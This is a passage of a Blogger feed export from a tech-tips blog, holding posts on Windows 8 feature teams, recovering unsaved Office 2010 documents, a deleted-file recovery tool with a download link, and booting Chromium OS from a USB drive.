&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Security &amp;amp; Identity&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Storage &amp;amp; Files Systems&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Sustained Engineering&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Telemetry&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;User-Centered Experience&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Windows Online&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Windows Update&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Wireless and Networking services&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;XAML&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;So what’s new and different here?&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;First, because the Softies have shared so few details so far about &lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_8&quot;&gt;Windows 8&lt;/a&gt; (even though there’s been lots of hacking and speculation about what’s inside, thanks to leaked slides and builds), many things that Microsoft pundits consider to be known about Windows 8 still haven’t gotten the “official” nod.&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;As of today, we now know for sure that there will be an App Store in &lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_8&quot;&gt;Windows 8&lt;/a&gt; (something we’ve expected since June 2010). “Hyper-V” seems to confirm that Hyper-V will be built into the client and server versions of &lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_8&quot;&gt;Windows 8&lt;/a&gt;. And the inclusion of &lt;a href=&quot;http://msdn.microsoft.com/en-us/library/ms752059.aspx&quot;&gt;XAML&lt;/a&gt; — developers of which were reorg’d into the Windows division earlier this summer — may give those with .Net and Silverlight expertise another glimmer of hope that the Windows 8 development story won’t be just about &lt;a href=&quot;http://en.wikipedia.org/wiki/HTML5&quot;&gt;HTML5&lt;/a&gt; and JavaScript.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;For some guesses on my part: “In Control of Your PC” could mean a lot of things, possibly even that &lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_8&quot;&gt;Windows 8&lt;/a&gt; will include built-in support for the Kinect sensor. “Search, View and Command” also could be Kinect-related, given Microsoft’s recent demos and pronouncements about Tellme voice support being built into &lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_8&quot;&gt;Windows 8&lt;/a&gt;. “Windows Online” has me most intrigued, especially given that it is listed separately from “Windows Update.”&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;For comparison’s sake, here’s a list of some of the feature teams that Sinofsky provided in August 2008 when he first began blogging about Windows 7:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Applets and Gadgets&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Assistance and Support Technologies&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Core User Experience&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Customer Engineering and Telemetry&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Deployment and Component Platform&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Desktop Graphics&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Devices and Media&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Devices and Storage&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Documents and Printing&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Engineering System and Tools&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;File System&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Find and Organize&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Fundamentals&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Internet Explorer (including IE 8 down-level)&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;International&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Kernel &amp;amp; VM&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Media Center&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Networking - Core&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Networking - Enterprise&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Networking - Wireless&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Security&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;User Interface Platform&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Windows App Platform&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_8&quot;&gt;Windows 8&lt;/a&gt; sleuths: What else do you glean (if anything) from Sinofsky’s latest blog post? One of my Twitter chums, Martin Anderson, notes that it looks like Media Center has disappeared from the feature list with &lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_8&quot;&gt;Windows 8&lt;/a&gt;, which may surprise some, but seem like a sad confirmation to others.&lt;/div&gt;&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/windows-8-new-features-updated.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-1849324747125516130</guid><pubDate>Fri, 19 Aug 2011 07:13:00 +0000</pubDate><atom:updated>2011-08-19T00:13:41.395-07:00</atom:updated><title>How To Recover An Unsaved MS Word 2010 Document In Seconds</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;This is only for educational purpose not any other means&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The general consensus is that most mishaps on our working with computers occur because of carelessness and an itchy trigger happy finger. It’s a bitter lesson that’s taught to us while working on documents like MS Word, MS Excel, or any other like &lt;a href=&quot;http://en.wikipedia.org/w/index.php?title=Special%3ASearch&amp;amp;search=MS+PowerPoint&quot;&gt;MS PowerPoint&lt;/a&gt;. The lesson says – save and save early.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Even with the right &lt;a href=&quot;http://en.wikipedia.org/w/index.php?title=Special%3ASearch&amp;amp;search=MS+Office&quot;&gt;MS Office&lt;/a&gt; etiquette in place, documents disappear from the screen before you can save them. The notorious Windows system crash or your house power on the blink could cause you to lose your work before you can click on save. Lot of times we also tend to close an unsaved document after taking a printout. So, how can you recover that unsaved MS Office document and restore your work (and also save yourself from a hair-tearing apoplectic attack)?&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;We turn to a little &lt;a href=&quot;http://office.microsoft.com/en-us/products/&quot;&gt;Microsoft Office 2010&lt;/a&gt; feature that lets us recover document drafts in a second.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Bringing Back The Draft&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Here’s my open MS Word document that will be taken through some deliberate steps to demonstrate the ‘life-saving’ feature that’s present in MS Word, MS Excel, and MS PowerPoint (MS Office 2010 only).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2011/06/word01.jpg&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;After closing the Word file unwittingly, open up a new MS Word document again. Go to File – Info – Manage Versions. Click on the little dropdown and select Recover Unsaved Documents. In Excel 2010 click on Recover Unsaved Workbooks or Recover Unsaved Presentations if you are in PowerPoint 2010.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2011/06/word02.jpg&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;MS Word opens the location where a copy of the draft resides.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2011/06/word03.jpg&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Now, it’s just a matter of selecting the draft, opening it up as a fresh MS Word document and saving it properly using the Save As button on the business bar at the top of the document; something which we ‘forgot ‘to do the last time around. Copies of unsaved documents are kept for four days and then they are automatically deleted.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2011/06/word04.jpg&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;While opening the unsaved document, you can also make use of the Open&amp;amp; Repair feature for troubleshooting documents that might have got corrupted or damaged.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2011/06/word05.jpg&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You can browse to the following file locations to open the file manually, depending on your operating system:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Windows 7/Windows Vista: C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\&amp;lt;Application_Name&amp;gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Windows XP: C:\Documents and Settings\&amp;lt;username&amp;gt; \Application Data\Microsoft\&amp;lt;App Name&amp;gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Saving of drafts takes place automatically in all applications within MS Office. The Auto Recover option kicks in if the document has been open for some period of time. You can easily change the Auto recover interval by going to File – Options – Save. The default is 10 minutes as indicated under – Save &lt;a href=&quot;http://support.microsoft.com/kb/107686&quot;&gt;AutoRecover&lt;/a&gt; Information. I prefer setting it to a more frequent 3 – 5 minutes. Remember that &lt;a href=&quot;http://support.microsoft.com/kb/107686&quot;&gt;AutoRecover&lt;/a&gt; may be a lifesaver, but it is not a substitute for the good habit of regularly saving your file while you are working on it.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2011/06/word06.jpg&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;http://support.microsoft.com/kb/107686&quot;&gt;AutoRecover&lt;/a&gt; is a feature to rely on and more often than not it will help save you from all that can go wrong while working on a long document. Microsoft Office 2010 makes it slightly easier to get back an unsaved document than the earlier versions of Office. If you are still on MS Office 2007, check out how you can use &lt;a href=&quot;http://www.makeuseof.com/tag/how-to-configure-save-with-autorecover-in-ms-word-2007/&quot;&gt;AutoRecover&lt;/a&gt; to come to your rescue. We have a substantial lineup of other &lt;a href=&quot;http://www.makeuseof.com/tags/microsoft-word/&quot;&gt;MS Word&lt;/a&gt; tips for you. Were you aware of this one?&lt;/div&gt;&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/how-to-recover-unsaved-ms-word-2010.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-607804855298405455</guid><pubDate>Fri, 19 Aug 2011 06:51:00 +0000</pubDate><atom:updated>2011-08-18T23:51:15.938-07:00</atom:updated><title>Deleted Files Recovery software</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;This is only for educational purpose not any other means&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://www.recovermydeletedfile.com/images/undelete-Screenshot.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;283&quot; src=&quot;http://www.recovermydeletedfile.com/images/undelete-Screenshot.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li style=&quot;text-align: justify;&quot;&gt;Recover accidentally deleted files&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;Recover deleted files lost after emptying recycle bin&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;Recover deleted files lost after using Shift+ Delete keys&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;Recover deletes files lost due to ‘del’ command usage from command prompt&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;Recover files deleted or lost after the &#39;Move&#39; or &#39;Cut&#39; command in Windows&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;Recover files quickly using the most powerful and fast disk scanning technology&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;Recover files from hard drives, flash drives, SD Cards, USB drives, ZIP, MMC, and FireWire drives&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;Preview recovered files before saving&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;Recover files from FAT16, FAT32, and NTFS formatted drives&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;http://remo.fileburst.com/remo-recover-windows.exe&quot;&gt;Click here to Download&lt;/a&gt;&lt;/div&gt;&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/deleted-files-recovery-software.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-7433382380413756671</guid><pubDate>Fri, 19 Aug 2011 06:10:00 +0000</pubDate><atom:updated>2011-08-18T23:10:32.797-07:00</atom:updated><title>How To Run Google Chrome OS</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Just a few days ago, Google announced the &lt;a href=&quot;http://googleblog.blogspot.com/2009/11/releasing-chromium-os-open-source.html&quot;&gt;release of the Chrome OS source code&lt;/a&gt;. Within less than 24 hours, the web was littered with disk images for running the new OS on &lt;a href=&quot;http://www.makeuseof.com/tags/virtual-machine/&quot;&gt;virtual machines&lt;/a&gt; such as VMWare and VirtualBox. I even managed to put together my own &lt;a href=&quot;http://geeklad.com/download-the-google-chrome-os-virtual-machine&quot;&gt;Google Chrome OS download&lt;/a&gt; in the form of a complete VirtualBox appliance. I’m pleased to announce that I’ve taken it a step further, and now you can easily try it on your own computer from a USB thumb drive.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Before You Get Started&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Before you decide to download Chrome OS, there are probably a few things I should tell you about it. It is in the very early stages of development, so there is still a lot of stuff that doesn’t work. In fact, it may not work for you at all.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You should also be made aware that this operating system is very simplistic by design, as it is intended for use on &lt;a href=&quot;http://en.wikipedia.org/wiki/Netbook&quot;&gt;netbook computers&lt;/a&gt;. By definition, a netbook is a small and inexpensive laptop intended for very casual use such as web browsing and simple office tasks. When you launch Chrome OS, pretty much all you get is a web browser. Don’t be surprised if you go through all this and say to yourself, “I did all that work just to log into a freakin’ browser?”&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Requirements&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;First of all, you will of course need a USB drive you can use to try it out. The disk image is 2,988,442,112 bytes, so you’ll probably need a 4GB thumb drive to be able to use it. If you have any files on your USB drive that you need, be sure to back them up to a safe place because this will wipe all the data from your USB drive. Consider yourself warned.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You will also need a computer that allows booting from a USB drive. You’ll need to instruct your computer’s BIOS to boot from the USB drive instead of the hard drive like it normally does. When you boot up your computer, it should provide you with information as to how to bring up a boot menu. On some machines it is the F8 key and others the F12 key or some other key.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;If it all scrolls by too fast, some computers will allow you to pause the boot sequence by pressing the Pause key. That should give you all the time you need to read all that stuff on the screen to see if you can find out what the boot menu key is (if there is one). If you don’t see anything about a boot menu, you could also try editing your BIOS settings to boot from the USB drive. You may wish to consult your computer (or motherboard) manual on how to do this.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You will also need a little bit of luck. Chromium OS may or may not work on your computer hardware. I did successfully run it on two home-built frankenstein computers (with ASUS motherboards), but it did not successfully recognize the network adapter on my Dell laptop. All of this work may be for nothing, if it ends up that Chromium OS does not like your network adapter. Ah yes, I forgot to mention that you do also need a computer with a network adapter.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Finally, you’ll need to download the necessary files to put Chromium OS (that’s what the open source version of Google Chrome OS is called) onto your USB drive. I’ve packaged it all together in a torrent for you:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;http://www.makeuseof.com/downloads/chromium_os_usb.torrent&quot;&gt;Download the Chromium OS for USB Torrent (Right-click and Save As)&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You’ll need a good BitTorrent client like &lt;a href=&quot;http://www.utorrent.com/&quot;&gt;µTorrent&lt;/a&gt; to download it. If you’re new to BitTorrent, be sure to check out our &lt;a href=&quot;http://www.makeuseof.com/tag/the-big-book-of-bittorrent-free-pdf/&quot;&gt;Big Book of BitTorrent&lt;/a&gt;. You’ll learn more than you’ll ever want to know about it.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The torrent has a zip file that includes the disk image, as well as a Windows tool for putting the image onto a USB drive. The program you’ll use to create the Chrome OS USB boot disk is called &lt;a href=&quot;https://launchpad.net/win32-image-writer&quot;&gt;Image Writer for Windows&lt;/a&gt;. It’s a nifty little tool for writing disk images, it’s free, and it’s open source.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You don’t need to download it seperately because I’ve already included it in the torrent. I just wanted to mention the good folks that developed the great application and send them some link love as well.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Installing Chromium OS to your USB Drive&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Unzip chrome_os_usb.zip, and launch Win32DiskImager.exe. If you need a program to unzip the archive, you can &lt;a href=&quot;http://www.izarc.org/download.html&quot;&gt;download IZArc&lt;/a&gt;. If you get the warning below when you launch Image Writer, don’t sweat it. It’s looking for a floppy disk that’s not there.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/11/image-writer-error.PNG&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Once you’ve got Image Writer running, click the folder icon and select thechrome_os.img file (it should be located in the same place where you extracted the zip file and launched Win32DiskImager.exe).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/11/image-writer-write-image.png&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Connect your USB drive to your PC. If you have autorun enabled, you may want to wait a few seconds for your computer to do its thing. Just close whatever window may pop up. Next, click on the Device dropdown and select the drive letter that corresponds to your USB drive. Then, click Write and the program will commence writing the disk image to your USB drive.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Boot Up Chromium OS&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You’re now ready to boot up Chromium OS! You can just leave the USB drive in your machine and reboot it. When the machine boots, press the boot menu key on your keyboard. Select your USB drive from the menu. In about 10 seconds or so, you should see the Chromium OS login screen.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2009/11/chromium-os-login.png&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
